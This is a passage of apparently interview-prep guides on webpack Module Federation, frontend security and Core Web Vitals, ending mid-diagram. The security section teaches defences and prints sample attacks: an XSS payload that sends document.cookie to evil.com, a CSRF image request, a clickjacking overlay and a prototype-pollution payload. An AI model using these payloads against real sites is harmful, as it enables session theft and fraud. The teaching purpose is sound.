- Remote is the source of truth for this domain; host doesn't even hold the state
- Works for cross-remote too: Remote A can import Remote B's hook with no host involvement
- Remote team fully owns the API contract; host team just consumes it

Limitation: Both apps must share the same React instance (singleton: true) for hooks to work. Also, the hook runs in the host's React tree — if the same hook is imported in two places, two separate state instances are created (not one shared cart). Fix: expose a store (Zustand/Redux) instead of a raw hook if shared singleton state is needed.

Best for: Feature-team ownership — cart team owns cart state and exposes a clean API; shell team consumes it without caring about implementation.
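
To show why a store avoids the two-instances problem, here is a framework-free sketch of a module-level cart store. createCartStore and cartStore are hypothetical names; a real project would more likely use Zustand or Redux as the text suggests.

```javascript
// Module-level state: created once per module instance, shared by every importer.
function createCartStore() {
  let items = [];
  const listeners = new Set();
  const notify = () => listeners.forEach((listener) => listener(items));
  return {
    getItems: () => items,
    addItem(item) {
      items = [...items, item];
      notify();
    },
    removeItem(id) {
      items = items.filter((i) => i.id !== id);
      notify();
    },
    // Returns an unsubscribe function, the shape React's useSyncExternalStore expects.
    subscribe(listener) {
      listeners.add(listener);
      return () => listeners.delete(listener);
    },
  };
}

// The remote would expose this single instance (for example as './cartStore').
const cartStore = createCartStore();
```

Unlike useState inside a hook, the items array here lives in the module, so a header badge and a product page that import cartStore observe the same cart.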

Strategy 3 — Shared Store (Redux / Zustand via shared modules)

Both host and remote depend on the same state library. You declare it as a shared singleton in Module Federation config. Both apps use the exact same store instance at runtime.

// Both host and remote webpack.config.js
new ModuleFederationPlugin({
  shared: {
    'zustand': { singleton: true, requiredVersion: '^4.0.0' },
    './src/store': { singleton: true }  // share the store module itself
  }
})

// Remote reads from the shared store directly
import { useStore } from 'zustand';
import { useAppStore } from 'hostApp/store'; // or a shared package

function RemoteCart() {
  const user = useAppStore(state => state.user); // same store the host writes to
  return <div>{user.name}'s cart</div>;
}

Why singleton matters: Without singleton: true, host and remote can end up with separate copies (for example when their required version ranges don't overlap), and state created against one copy is invisible to the other. singleton: true forces one version to win and both apps use it.

Best for: Deeply integrated micro-frontends where the remote genuinely needs global app state (auth, cart, theme).

Strategy 4 — Custom Events (decoupled, cross-framework)

Host and remote communicate through the browser's native CustomEvent API on window. Zero coupling — works even if remote is Vue and host is React.

// Host dispatches an event when user logs in
window.dispatchEvent(new CustomEvent('app:user-changed', {
  detail: { user: { id: 1, name: 'Alice', role: 'admin' } }
}));

// Remote listens — doesn't know or care who the host is
useEffect(() => {
  const handler = (e) => setUser(e.detail.user);
  window.addEventListener('app:user-changed', handler);
  return () => window.removeEventListener('app:user-changed', handler);
}, []);

Best for: Loosely coupled apps from different teams, cross-framework communication, fire-and-forget events (user logged out, theme changed, language switched).

Limitation: No history — remote mounted after the event fires misses it. Fix: host also writes to window.__APP_STATE__ as a fallback initial read.
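
One way to address the missed-event limitation is a bus that replays the last payload to late subscribers. The sketch below is a plain pub/sub written for illustration (createReplayBus is a hypothetical name); in a browser the same idea can be layered on window.dispatchEvent and addEventListener.

```javascript
// Tiny pub/sub that remembers the last payload per event name, so a subscriber
// that mounts late still receives the current value.
function createReplayBus() {
  const listeners = new Map(); // event name -> Set of handlers
  const lastPayload = new Map(); // event name -> most recent detail
  return {
    emit(name, detail) {
      lastPayload.set(name, detail);
      (listeners.get(name) || []).forEach((handler) => handler(detail));
    },
    on(name, handler) {
      if (!listeners.has(name)) listeners.set(name, new Set());
      listeners.get(name).add(handler);
      if (lastPayload.has(name)) handler(lastPayload.get(name)); // replay for late subscribers
      return () => listeners.get(name).delete(handler);
    },
  };
}
```

The on method returns an unsubscribe function, which fits the cleanup slot of a useEffect like the one in the remote listener above.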

Strategy 5 — Shared Context (React-specific, elegant)

Host exposes a React Context provider as a shared module. Remote consumes it. Both use the same React instance (enforced by singleton: true) so context propagates normally.

// host-app/src/UserContext.js (exposed via MF)
import React, { useState } from 'react';
export const UserContext = React.createContext(null);
export const UserProvider = ({ children }) => {
  const [user, setUser] = useState(null);
  return <UserContext.Provider value={{ user, setUser }}>{children}</UserContext.Provider>;
};

// host webpack.config.js
exposes: { './UserContext': './src/UserContext' }

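// Remote consumes it (must render inside the host's <UserProvider>)
import { useContext } from 'react';
import { UserContext } from 'hostApp/UserContext';

// RemoteGreeting is an illustrative component name
function RemoteGreeting() {
  const { user } = useContext(UserContext); // hooks must be called inside a component
  return <span>{user ? user.name : 'Guest'}</span>;
}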

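Why this works: a context is matched by the identity of the object returned from createContext, and its value is carried by React's fiber tree. As long as both apps use the same React instance (singleton: true), import the same UserContext module, and the remote renders inside the host's UserProvider, context crosses the module federation boundary transparently.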

Best for: Auth context, theme context, feature flags — any tree-wide data the host owns that remotes need to read.

Which Pattern When?

#	Pattern	Direction	Use when	Avoid when
1	Props	host → remote	Remote is a display component	Remote needs to push data back up
2	Exposed API / Hook	remote → host	Remote owns the domain (cart, auth)	Several callers must share one state instance (each hook call creates its own); expose a store instead
3	Shared Store	bidirectional	Deep integration, remote needs read+write	Teams shouldn't share state contracts
4	Custom Events	any direction	Cross-framework, loosely coupled teams	You need synchronous read of current state
5	Shared Context	any direction	React-only, tree-wide data (auth, theme)	Remote is not React

Content Hashing & Caching

output: {
  filename: '[name].[contenthash].js'
}

- [contenthash] changes only when file content changes
- app.abc123.js → unchanged → browser uses cache
- app.def456.js → content changed → browser re-downloads

Without content hash: a fixed file name risks browsers serving a stale cached copy, and a single build-wide hash invalidates every cached file on each deploy even if only one file changed.
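
The idea behind [contenthash] can be shown with a small helper that derives a file name from file contents. hashedFilename is a hypothetical function using SHA-256 from Node's crypto module; webpack uses its own configurable hash function and digest length.

```javascript
const { createHash } = require('node:crypto');

// Hypothetical helper: derive a file name from the bytes it contains.
function hashedFilename(name, content, length = 8) {
  const hash = createHash('sha256').update(content).digest('hex').slice(0, length);
  return `${name}.${hash}.js`;
}
```

Identical content always yields the same name, so an unchanged vendors chunk keeps its URL across deploys and stays in the browser cache.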

HMR — Hot Module Replacement

In development, webpack watches for file changes and pushes only the changed module to the browser — without a full page reload.

File saved → webpack recompiles changed module →
  WebSocket push to browser → module swapped in memory →
  React state preserved (with React Fast Refresh)

vs. Live Reload: any file change → full browser refresh → state lost.

Other Important Concepts

`resolve.alias` — Path Shortcuts

Tired of ../../components/Button? Alias maps a short name to a path.

resolve: {
  alias: {
    '@components': path.resolve(__dirname, 'src/components'),
    '@utils':      path.resolve(__dirname, 'src/utils'),
  }
}

// Now in any file:
import Button from '@components/Button'; // instead of '../../components/Button'

Also configure resolve.extensions so you can skip file extensions:

resolve: { extensions: ['.tsx', '.ts', '.jsx', '.js'] }
// import App from './App'  → webpack tries App.tsx, App.ts, App.jsx, App.js
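
The extension lookup can be sketched as a loop over candidates. resolveWithExtensions is a hypothetical helper, the exists callback is injected so nothing touches the real file system, and trying the exact request first is an assumed simplification of what webpack's resolver does.

```javascript
// Try each extension in order and return the first path that exists.
function resolveWithExtensions(request, extensions, exists) {
  if (exists(request)) return request; // an exact match wins (assumed behaviour)
  for (const ext of extensions) {
    const candidate = request + ext;
    if (exists(candidate)) return candidate;
  }
  throw new Error(`Module not found: ${request}`);
}
```

Order matters: with both App.ts and App.js on disk, the list above resolves './App' to the TypeScript file because '.ts' comes before '.js'.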

`publicPath` — Where Assets Are Served From

Tells webpack the base URL prefix for all asset URLs in the output.

output: {
  publicPath: 'https://cdn.example.com/assets/'
}
// → <script src="https://cdn.example.com/assets/app.abc123.js">
// → background: url('https://cdn.example.com/assets/logo.png')

If you deploy to a sub-path: publicPath: '/my-app/'. If wrong, lazy-loaded chunks 404 because the browser requests /chunk.js instead of /my-app/chunk.js. With Module Federation, the remote's publicPath also decides where its exposed chunks are fetched from once remoteEntry.js has loaded, so it is critical to get right.

`devServer` — Local Development

devServer: {
  port: 3000,
  hot: true,              // HMR
  historyApiFallback: true, // SPA: serve index.html for all 404 routes
  proxy: {
    '/api': 'http://localhost:8080'  // proxy API calls to backend (object form; webpack-dev-server v5 expects an array of { context, target } entries)
  }
}

historyApiFallback is critical for React Router — without it, refreshing /dashboard returns a 404 because there's no actual file at that path.

Source Maps — Debugging Minified Code

Minified production code is unreadable. Source maps link minified output back to original source.

devtool: 'eval-cheap-module-source-map'  // fast, development only
devtool: 'source-map'                    // separate .map file, production-safe
devtool: false                           // no source maps (fastest build)

`devtool` value	Speed	Use case
`eval`	Fastest	Dev only, no column info
`eval-cheap-module-source-map`	Fast	Dev — good quality, recommended
`source-map`	Slow	Production — full, separate `.map` file
`hidden-source-map`	Slow	Production — map not linked in bundle (upload to Sentry only)

hidden-source-map is the production best practice: you upload the .map to your error tracker (Sentry) but it's never exposed to users in the browser.

Environment Variables

// webpack.config.js
new webpack.DefinePlugin({
  'process.env.API_URL': JSON.stringify(process.env.API_URL),
  'process.env.NODE_ENV': JSON.stringify('production'),
})

DefinePlugin does text replacement at build time — not runtime injection. process.env.API_URL in source code is literally replaced with the string value during compilation. Dead code elimination then removes if (process.env.NODE_ENV === 'development') { ... } blocks entirely in production.

// Source code
if (process.env.NODE_ENV === 'development') {
  console.log('debug info');  // ← removed entirely in production build
}
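
The build-time replacement can be imitated with a naive string substitution. This is only an illustration of the effect: applyDefines is a hypothetical helper, and the real DefinePlugin replaces matching expressions while parsing the module rather than searching raw text.

```javascript
// Replace every occurrence of each defined expression with its literal value.
function applyDefines(source, definitions) {
  return Object.entries(definitions).reduce(
    (code, [expression, replacement]) => code.split(expression).join(replacement),
    source,
  );
}

const source = "if (process.env.NODE_ENV === 'development') { console.log('debug info'); }";
const replaced = applyDefines(source, {
  'process.env.NODE_ENV': JSON.stringify('production'),
});
// `replaced` now compares two string literals, so the condition is constant
// and a minifier can drop the whole block as unreachable.
```

This also shows why values are wrapped in JSON.stringify: the replacement is pasted in as code, so a string must arrive with its quotes.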

Webpack 5 Persistent Cache

Build times in large projects can exceed 60 seconds. Webpack 5 introduced filesystem caching — stores the compilation result to disk between builds.

cache: {
  type: 'filesystem',          // persist to disk ('memory' is the default in development mode)
  buildDependencies: {
    config: [__filename],      // invalidate cache if webpack.config.js changes
  }
}

- First build: normal speed (populates cache)
- Subsequent builds: can be 5–10× faster, since only changed modules are recompiled
- Cache stored in node_modules/.cache/webpack

Asset Modules (Webpack 5) — No More url-loader / file-loader

Webpack 5 handles static assets natively without extra loaders.

module: {
  rules: [
    {
      test: /\.(png|jpg|gif)$/,  // svg is handled by the asset/inline rule below
      type: 'asset',           // auto: inline if <8KB, emit file if >8KB
    },
    {
      test: /\.svg$/,
      type: 'asset/inline',   // always base64 inline (no HTTP request)
    },
    {
      test: /\.(woff2|ttf)$/,
      type: 'asset/resource', // always emit as separate file
    }
  ]
}

Asset type	Behavior
`asset/resource`	Emits file, returns URL
`asset/inline`	Base64-encodes into bundle (no extra request)
`asset/source`	Returns file content as string
`asset`	Auto-decides: inline if under `parser.dataUrlCondition.maxSize`

Webpack vs Alternatives

Tool	Approach	Best for
Webpack	Full bundler, highly configurable	Large apps, micro-frontends, complex pipelines
Vite	ESM dev server (no bundle in dev), Rollup for prod	Fast DX, modern projects
Rollup	Optimized for libraries	Publishing npm packages
esbuild	Go-based, extremely fast	CI speed, used inside Vite
Parcel	Zero-config bundler	Small/medium apps

Webpack is the most configurable and battle-tested. Vite is winning for new projects due to near-instant dev server. In large enterprises with module federation requirements, webpack remains dominant.

Interview Summary

One-liner definitions

Concept	Say this
Webpack	"A static module bundler that builds a dependency graph from an entry point and emits optimized chunks via loaders and plugins."
Loader	"Transforms a non-JS file type into a JS module webpack can process."
Plugin	"Hooks into the compilation lifecycle to perform operations on the output bundle — minification, extraction, injection."
Chunk	"A group of modules emitted as a single output file — can be initial (loaded on start) or async (lazy-loaded on demand)."
Tree shaking	"Dead code elimination for ES modules — unused exports are removed at build time in production mode."
Module Federation	"Allows separate webpack builds to expose and consume modules from each other at runtime — enables true independent micro-frontend deployments."

Key talking points

"Webpack solves the N-HTTP-requests problem by building a dependency graph and bundling everything. But the real power is code splitting — you only send what the user needs for the current page."
"Loaders and plugins are often confused. Loaders transform individual files before they enter the graph. Plugins operate on the entire compilation — they can split chunks, extract CSS, inject HTML, anything."
"Tree shaking only works with ES modules because they're statically analyzable. CommonJS require() is dynamic — webpack can't know at build time which exports are used."
"The vendor split trick is critical for caching. App code changes every deploy, node_modules rarely do. Separate chunks = vendors stay cached, only app re-downloads."
"Module federation is the webpack answer to micro-frontends. Instead of each app bundling React separately, they share it at runtime. The host loads a remoteEntry.js manifest and pulls modules from other deployed apps on demand."
"MF deliberately uses window as a shared registry — window.headerApp is the container. This is the one place webpack intentionally pollutes global scope, because there's no other communication channel between separately deployed builds at runtime."
"Data passing in MF has five patterns. Props (host → remote) and Exposed API/Hook (remote → host) are the two direct module patterns — mirror images of each other. Then Shared Store (bidirectional, deep integration), Custom Events (decoupled, cross-framework), and Shared Context (React tree-wide). The key insight with Exposed API: the remote owns the domain data and exposes a clean hook or store — the host just consumes it without holding any of that state itself."
"Source maps in production should be hidden-source-map — the .map file is generated and uploaded to an error tracker like Sentry, but never linked in the bundle. Users can't read your source. Your engineers can debug stack traces."
"Webpack 5 persistent cache (cache: { type: 'filesystem' }) makes repeat builds 5–10× faster. It's a one-liner that most teams don't know about but should always use in CI."

Frontend Security: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 19:38:32 +0000

Security is not optional. Understanding attack vectors and defenses is essential for any production system.

1. XSS (Cross-Site Scripting)

The most common frontend vulnerability (~40% of reported vulnerabilities). Attacker injects malicious scripts into your page.

Types of XSS

Type	How It Works	Example
Stored XSS	Malicious script saved in DB, served to all users	Comment: `<script>steal(cookies)</script>`
Reflected XSS	Script in URL, reflected in response	`site.com/search?q=<script>alert(1)</script>`
DOM-based XSS	Script manipulates DOM client-side	`innerHTML = location.hash`

Attack Example

// User submits this as their "name"
const userName = '<img src=x onerror="fetch(\'https://evil.com/steal?cookie=\'+document.cookie)">';

// Vulnerable code
document.getElementById('greeting').innerHTML = `Hello, ${userName}!`;

// Result: attacker receives every cookie readable from JavaScript (anything not marked HttpOnly)!

Defense: Output Encoding

// NEVER use innerHTML with user data
element.innerHTML = userInput;  // DANGEROUS

// Use textContent instead
element.textContent = userInput;  // SAFE - treats as text, not HTML

// Or sanitize HTML when you need rich content
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);
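
When markup has to be assembled as a string (for example in a server-side template), textContent is not an option. The following is a minimal sketch of output encoding for element content and quoted attribute values. The helper name escapeHtml is hypothetical and not part of any library mentioned here.

```javascript
// Hypothetical helper: encode the five characters that are significant in HTML.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The payload from the attack example becomes inert text.
const userName = '<img src=x onerror="alert(1)">';
const greeting = `<p>Hello, ${escapeHtml(userName)}!</p>`;
```

This only covers HTML text and quoted attributes. URLs, inline scripts, and CSS need their own context-specific encoding.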

Defense: React's Automatic Escaping

// React escapes by default - SAFE
<div>{userInput}</div>

// DANGEROUS - explicitly bypasses protection
<div dangerouslySetInnerHTML={{ __html: userInput }} />

// If you must use it, sanitize first
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(userInput) }} />

Defense: Content Security Policy (CSP)

Content-Security-Policy:
  default-src 'self';
  script-src 'self' https://trusted-cdn.com;
  style-src 'self' 'unsafe-inline';
  img-src *;
  connect-src 'self' https://api.myapp.com;
  frame-ancestors 'none';

Directive	Purpose
`default-src`	Fallback for all resource types
`script-src`	Where JS can load from
`style-src`	Where CSS can load from
`img-src`	Where images can load from
`connect-src`	Where fetch/XHR can connect
`frame-ancestors`	Who can embed this page (clickjacking prevention)

CSP: Nonces for Inline Scripts

<!-- Server generates random nonce per request -->
<script nonce="random123abc">
  // This inline script is allowed
  console.log('Trusted inline code');
</script>

<!-- Header includes the nonce -->
Content-Security-Policy: script-src 'nonce-random123abc'

<!-- Attacker's injected script has no nonce = BLOCKED -->
<script>alert('XSS')</script>
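
The nonce only helps if it is unpredictable and regenerated for every response. A minimal server-side sketch in Node follows; createNonce and renderWithNonce are hypothetical names, and how the header and markup reach the client depends on your framework.

```javascript
const { randomBytes } = require('node:crypto');

// Generate a fresh, unpredictable nonce (16 random bytes, base64-encoded).
function createNonce() {
  return randomBytes(16).toString('base64');
}

// Build the header value and the matching script tag from the same nonce.
function renderWithNonce(inlineScript) {
  const nonce = createNonce();
  return {
    nonce,
    header: `script-src 'nonce-${nonce}'`,
    html: `<script nonce="${nonce}">${inlineScript}</script>`,
  };
}

const page = renderWithNonce("console.log('Trusted inline code');");
```

Reusing one nonce across requests would let an attacker who has seen it once attach it to injected scripts, which is why it is created inside the per-response function.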

Defense: Trusted Types API

// Force browser to block unsafe DOM manipulations
// Works in Chrome/Edge

// In CSP header:
Content-Security-Policy: require-trusted-types-for 'script'

// Now this throws an error:
element.innerHTML = userInput;  // TypeError!

// Must use a Trusted Type:
const policy = trustedTypes.createPolicy('myPolicy', {
  createHTML: (input) => DOMPurify.sanitize(input)
});

element.innerHTML = policy.createHTML(userInput);  // OK

2. CSRF (Cross-Site Request Forgery)

Attacker tricks user's browser into making authenticated requests to your site.

The Attack

1. User logs into bank.com (session cookie set)
2. User visits evil.com
3. evil.com has: <img src="https://bank.com/transfer?to=attacker&amount=10000">
4. Browser sends request WITH bank.com cookies automatically
5. Transfer happens without user's knowledge!

Defense: SameSite Cookies

Set-Cookie: session=abc123; SameSite=Strict; Secure; HttpOnly

SameSite Value	Behavior
`Strict`	Cookie NEVER sent on cross-site requests
`Lax`	Cookie sent on top-level GET navigations (link clicks), not on cross-site POSTs, images, iframes, or fetch/XHR
`None`	Cookie always sent (must have `Secure` flag)

Defense: CSRF Tokens (Synchronizer Token Pattern)

<!-- Server embeds unique token in form -->
<form action="/transfer" method="POST">
  <input type="hidden" name="csrf_token" value="abc123xyz">
  <input type="text" name="amount">
  <button type="submit">Transfer</button>
</form>

// Server validates token matches session
if (request.body.csrf_token !== session.csrfToken) {
  return res.status(403).send('Invalid CSRF token');
}
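
A plain !== comparison can return early on the first differing character. As a hedged sketch, the same check can be done in constant time with Node's crypto.timingSafeEqual. The function name isValidCsrfToken is hypothetical, and tokens are assumed to be strings.

```javascript
const { timingSafeEqual } = require('node:crypto');

// Compare the submitted token with the session token in constant time.
// Returns false for missing values or length mismatches.
function isValidCsrfToken(submitted, expected) {
  if (typeof submitted !== 'string' || typeof expected !== 'string') return false;
  const a = Buffer.from(submitted);
  const b = Buffer.from(expected);
  if (a.length !== b.length) return false; // timingSafeEqual throws on unequal lengths
  return timingSafeEqual(a, b);
}
```

In the handler above this would replace the inequality test: reject with 403 when isValidCsrfToken(request.body.csrf_token, session.csrfToken) is false.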

Defense: Double-Submit Cookie (For SPAs)

// Server sets a random value in a cookie
Set-Cookie: XSRF-TOKEN=random123; Path=/

// Frontend reads it and sends in header
const token = document.cookie
  .split('; ')
  .find(row => row.startsWith('XSRF-TOKEN='))
  ?.split('=')[1];

fetch('/api/transfer', {
  method: 'POST',
  headers: {
    'X-XSRF-TOKEN': token  // Server compares cookie vs header
  }
});

// Attacker can't read our cookies, so can't forge the header!
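
The split('=')[1] lookup above truncates any token that itself contains an = character (common with base64). A slightly more defensive sketch follows; readCookie is a hypothetical helper, and it assumes the server URL-encodes the cookie value.

```javascript
// Hypothetical helper: read one cookie from a "name=value; name2=value2" string.
function readCookie(cookieString, name) {
  for (const pair of cookieString.split('; ')) {
    const index = pair.indexOf('=');
    if (index === -1) continue;
    if (pair.slice(0, index) === name) {
      // Keep everything after the first "=", then undo URL-encoding (assumed)
      return decodeURIComponent(pair.slice(index + 1));
    }
  }
  return undefined;
}

// In the browser this would be readCookie(document.cookie, 'XSRF-TOKEN').
const token = readCookie('theme=dark; XSRF-TOKEN=abc=123%2F; lang=en', 'XSRF-TOKEN');
```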

3. Secure State & Storage Management

One of the most common senior-level mistakes is storing sensitive data insecurely.

The Storage Hierarchy

Storage	Security	Use For
`localStorage`	Accessible to ANY JS (XSS vulnerable)	Non-sensitive preferences
`sessionStorage`	Same as localStorage, cleared on tab close	Temporary non-sensitive data
`HttpOnly Cookie`	NOT accessible to JS	Session tokens, auth tokens
`In-Memory`	Lost on refresh, safest from XSS	Short-lived access tokens

The Secure Token Pattern

┌──────────┐                              ┌──────────┐
│  Client  │                              │  Server  │
└────┬─────┘                              └────┬─────┘
     │                                         │
     │  Login: username/password               │
     │────────────────────────────────────────▶│
     │                                         │
     │  Access Token (15min) in JSON body      │
     │  Refresh Token in HttpOnly cookie       │
     │◀────────────────────────────────────────│
     │                                         │
     │  Store access token IN MEMORY ONLY      │
     │                                         │
     │  API calls with: Authorization: Bearer  │
     │────────────────────────────────────────▶│
     │                                         │
     │  Access token expired (401)             │
     │◀────────────────────────────────────────│
     │                                         │
     │  POST /refresh (HttpOnly cookie sent)   │
     │────────────────────────────────────────▶│
     │                                         │
     │  New access token in response body      │
     │◀────────────────────────────────────────│

Why this pattern?

Access token in memory: XSS can't steal it from localStorage
Refresh token in HttpOnly cookie: XSS can't read it
Short-lived access token: Limits damage window if stolen
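
The flow in the diagram can be sketched as a small client wrapper. This is an illustration under stated assumptions, not a reference implementation: createAuthClient is a hypothetical name, the /refresh endpoint is assumed to return JSON shaped like { accessToken }, and fetchImpl is passed in so the sketch can run outside a browser.

```javascript
// Sketch: the access token lives only in a closure; the refresh token stays in
// an HttpOnly cookie that the browser attaches to /refresh automatically.
function createAuthClient(fetchImpl) {
  let accessToken = null; // never written to localStorage or sessionStorage

  async function refresh() {
    const res = await fetchImpl('/refresh', { method: 'POST', credentials: 'include' });
    if (!res.ok) throw new Error('Session expired');
    accessToken = (await res.json()).accessToken; // assumed response shape
  }

  async function request(url, options = {}) {
    const send = () =>
      fetchImpl(url, {
        ...options,
        headers: { ...options.headers, Authorization: `Bearer ${accessToken}` },
      });

    if (accessToken === null) await refresh(); // e.g. after a page reload
    let res = await send();
    if (res.status === 401) {
      await refresh(); // token expired: get a new one and retry once
      res = await send();
    }
    return res;
  }

  return { request };
}
```

In a browser you would call createAuthClient(window.fetch.bind(window)). A production version would also share one in-flight refresh between concurrent requests instead of refreshing once per 401.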

4. Clickjacking (UI Redressing)

Attacker overlays invisible iframe over legitimate content.

The Attack

<!-- On evil.com -->
<style>
  iframe {
    opacity: 0;
    position: absolute;
    top: 0; left: 0;
    width: 100%; height: 100%;
  }
</style>

<button>Click to win $1000!</button>
<iframe src="https://bank.com/transfer?to=attacker"></iframe>

<!-- User thinks they click button, actually clicks iframe -->

Defense: X-Frame-Options

X-Frame-Options: DENY              # Never allow framing
X-Frame-Options: SAMEORIGIN        # Only same origin can frame

Defense: CSP frame-ancestors (Modern)

Content-Security-Policy: frame-ancestors 'self' https://trusted.com

5. Third-Party Supply Chain Attacks

Modern frontend apps have thousands of dependencies. If one package is compromised, your system is at risk.

Defense: Subresource Integrity (SRI)

<script
  src="https://cdn.example.com/library.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous">
</script>

If the file's hash doesn't match, browser refuses to execute.
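
The integrity value is the base64-encoded digest of the file's bytes, prefixed with the algorithm name. A minimal sketch for generating it at build time with Node's crypto module follows (sriHash is a hypothetical helper name):

```javascript
const { createHash } = require('node:crypto');

// Compute the value for the integrity attribute from the file's content.
function sriHash(content, algorithm = 'sha384') {
  const digest = createHash(algorithm).update(content).digest('base64');
  return `${algorithm}-${digest}`;
}

// In a real build step, content would come from fs.readFileSync(pathToLibrary).
const integrity = sriHash("console.log('library');");
```

Any change to the file, even a single byte, produces a different digest, which is what lets the browser detect a tampered CDN response.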

Defense: Automated Auditing

# In CI/CD pipeline
npm audit --audit-level=high
# Fails build if high/critical vulnerabilities found

Defense: Sandboxed Iframes for Third-Party Scripts

<!-- Risky third-party script (e.g., ad tracker) -->
<iframe
  src="https://ads.example.com/tracker"
  sandbox="allow-scripts"
  style="display: none;">
</iframe>

<!-- sandbox restricts: -->
<!-- - No access to parent DOM -->
<!-- - No cookies from parent origin -->
<!-- - No form submission -->
<!-- - No top-level navigation -->

6. Prototype Pollution

A JavaScript-specific attack where attacker modifies Object.prototype.

The Attack

// Vulnerable merge function
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object') {
      target[key] = merge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker sends JSON payload:
const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, malicious);

// Now EVERY object has isAdmin: true!
const user = {};
console.log(user.isAdmin);  // true!

Defense

// Check for dangerous keys
function safeMerge(target, source) {
  for (let key in source) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
      continue;  // Skip dangerous keys
    }
    if (typeof source[key] === 'object' && source[key] !== null) {
      target[key] = safeMerge(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Or use Object.create(null) for prototype-less objects
const safeObject = Object.create(null);  // No prototype chain
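
Another option is to strip the dangerous keys at the parsing boundary, before any merge runs. This sketch uses the standard reviver argument of JSON.parse; parseUntrustedJson and BLOCKED_KEYS are hypothetical names.

```javascript
// Sketch: drop prototype-related keys while parsing untrusted JSON.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function parseUntrustedJson(text) {
  // Returning undefined from the reviver deletes that property from the result
  return JSON.parse(text, (key, value) => (BLOCKED_KEYS.has(key) ? undefined : value));
}

const parsed = parseUntrustedJson('{"name": "Ada", "__proto__": {"isAdmin": true}}');
```

The trade-off is that legitimate fields literally named constructor or prototype are dropped too, so this fits payloads whose schema you control.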

7. Secrets Management

Never Expose in Frontend Code

// WRONG: Bundled into client JS, visible to anyone
const API_KEY = 'sk_live_abc123';
fetch(`https://api.stripe.com/charges?key=${API_KEY}`);

// RIGHT: Proxy through your server
fetch('/api/create-charge', { method: 'POST', body: data });

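// Server adds the secret and relays the result
app.post('/api/create-charge', async (req, res) => {
  const upstream = await fetch('https://api.stripe.com/charges', {
    method: 'POST',
    headers: { 'Authorization': `Bearer ${process.env.STRIPE_SECRET_KEY}` }
    // request body omitted here for brevity
  });
  res.status(upstream.status).json(await upstream.json());
});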

What's OK to Expose

// Public/Publishable keys are DESIGNED for frontend
const STRIPE_PUBLISHABLE_KEY = 'pk_live_xyz';  // OK
const FIREBASE_API_KEY = 'AIzaSy...';  // OK (scoped by security rules)
const GOOGLE_MAPS_KEY = 'abc123';  // OK (restricted by HTTP referrer)

8. Secure Headers Checklist

# Prevent XSS
Content-Security-Policy: default-src 'self'; script-src 'self'

# Prevent clickjacking
X-Frame-Options: DENY

# Prevent MIME sniffing
X-Content-Type-Options: nosniff

# Force HTTPS for 1 year
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

# Control Referer header
Referrer-Policy: strict-origin-when-cross-origin

# Limit browser features
Permissions-Policy: geolocation=(), microphone=(), camera=()
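
One way to apply the checklist consistently is a single function that every response passes through. This is a sketch, assuming a response object with setHeader(name, value) such as Node's http.ServerResponse; applySecurityHeaders is a hypothetical name.

```javascript
// Header values copied from the checklist above.
const SECURITY_HEADERS = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self'",
  'X-Frame-Options': 'DENY',
  'X-Content-Type-Options': 'nosniff',
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload',
  'Referrer-Policy': 'strict-origin-when-cross-origin',
  'Permissions-Policy': 'geolocation=(), microphone=(), camera=()',
};

// Works with any response object exposing setHeader(name, value).
function applySecurityHeaders(res) {
  for (const [name, value] of Object.entries(SECURITY_HEADERS)) {
    res.setHeader(name, value);
  }
  return res;
}
```

In Express this could run as middleware: app.use((req, res, next) => { applySecurityHeaders(res); next(); }).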

9. Security Checklist Summary

Priority	Action	Reason
Critical	HTTPS Only	Protects data in transit (MitM attacks)
Critical	Sanitize & Validate	Never trust user input, URL params, or API data
Critical	CSP with nonces	Mitigates XSS by blocking inline scripts
High	HttpOnly cookies	Prevents XSS from stealing session tokens
High	SameSite=Strict cookies	Prevents CSRF attacks
High	No secrets in frontend	Use server-side proxy for sensitive API keys
Medium	SRI for CDN scripts	Prevents supply chain attacks
Medium	Automated dependency audits	Catches vulnerable packages early

10. Interview Tip

"I approach frontend security with defense in depth. For XSS, I use output encoding (textContent over innerHTML), React's automatic escaping, and strict CSP with nonces. For CSRF, I combine SameSite cookies with token validation. For authentication, I prefer short-lived access tokens in memory with refresh tokens in HttpOnly cookies — this limits XSS damage while maintaining usability. I always validate on the server (client validation is just UX), use SRI for CDN scripts, and ensure secure headers are set (HSTS, X-Frame-Options, CSP). For supply chain security, I integrate npm audit into CI/CD."

Core Web Vitals: A Senior Engineer's Guide

Arghya Majumder — Tue, 31 Mar 2026 13:28:19 +0000

A comprehensive guide to measuring and optimizing Core Web Vitals for system design interviews.

1. What Are Core Web Vitals?

Core Web Vitals are Google's standardized metrics for measuring user experience. They directly impact SEO rankings.

┌─────────────────────────────────────────────────────────────┐
│                    CORE WEB VITALS                          │
├──────────────────┬──────────────────┬──────────────────────┤
│       LCP        │       INP        │        CLS           │
│    Loading       │  Interactivity   │   Visual Stability   │
│                  │                  │                      │
│  < 2.5s GOOD     │  < 200ms GOOD    │   < 0.1 GOOD        │
│  2.5-4s NEEDS    │  200-500ms NEEDS │   0.1-0.25 NEEDS    │
│  > 4s POOR       │  > 500ms POOR    │   > 0.25 POOR       │
└──────────────────┴──────────────────┴──────────────────────┘

2. LCP (Largest Contentful Paint)

What It Measures

The time it takes for the largest visible element to render in the viewport.

┌─────────────────────────────────────────────────────────────┐
│  Timeline                                                    │
│                                                              │
│  0ms ─────────────────────────────────────────────▶ 2500ms  │
│       │              │              │                        │
│       │              │              └── LCP: Hero image      │
